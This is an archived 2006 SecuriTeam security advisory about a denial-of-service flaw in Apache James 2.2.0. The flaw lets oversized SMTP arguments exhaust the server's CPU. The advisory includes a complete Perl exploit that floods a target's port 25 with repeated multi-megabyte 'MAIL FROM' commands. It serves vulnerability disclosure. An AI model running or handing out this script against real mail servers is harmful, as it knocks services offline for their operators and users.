The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Java Apache Mail Enterprise Server (JAMES) DoS


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 1 Jun 2006 11:03:17 +0200
Subject: [UNIX] Java Apache Mail Enterprise Server (JAMES) DoS
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060601091223.ED73157C2@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Java Apache Mail Enterprise Server (JAMES) DoS
------------------------------------------------------------------------


SUMMARY

The  <http://james.apache.org/>; Java Apache Mail Enterprise Server (a.k.a. 
Apache James) is a 100% pure Java SMTP and POP3 Mail server and NNTP News 
server. James also designed to be a complete and portable enterprise mail 
engine solution based on currently available open protocols. James is 
based upon the Apache  <http://avalon.apache.org/>; Avalon application 
framework.

Apache James is vulnerable to DoS due to misuse of long variables.

DETAILS

Vulnerable Systems:
 * Java Apache Mail Enterprise Server (a.k.a. Apache James) version 2.2.0

James SMTP servers are allowing attacker to supply a long variable as an 
SMTP argument (such as MAIL) to the SMTP server, because of this 
vulnerability the Processor on the server machine will have a workload up 
to 100%.

Exploit:
#!/usr/bin/perl -w
use IO::Socket;
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";
if(@ARGV == 1)
{
    my $host = $ARGV[0];
    my $i = 1;
      
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, 
PeerPort=>"25", Reuse=>1)
        or die " Cannot Connect to Server !";

    while ( $i++ ) {
        print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
        print " -- sucking CPU resources at $host .....\n";
        sleep(1);
    }
    
    close $socket;
}
else
{
    print " Usage: $0 [target] \r\n\n";
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:y3dips@echo.or.id.> y3dips.
The original article can be found at:
 <http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt>; 
http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру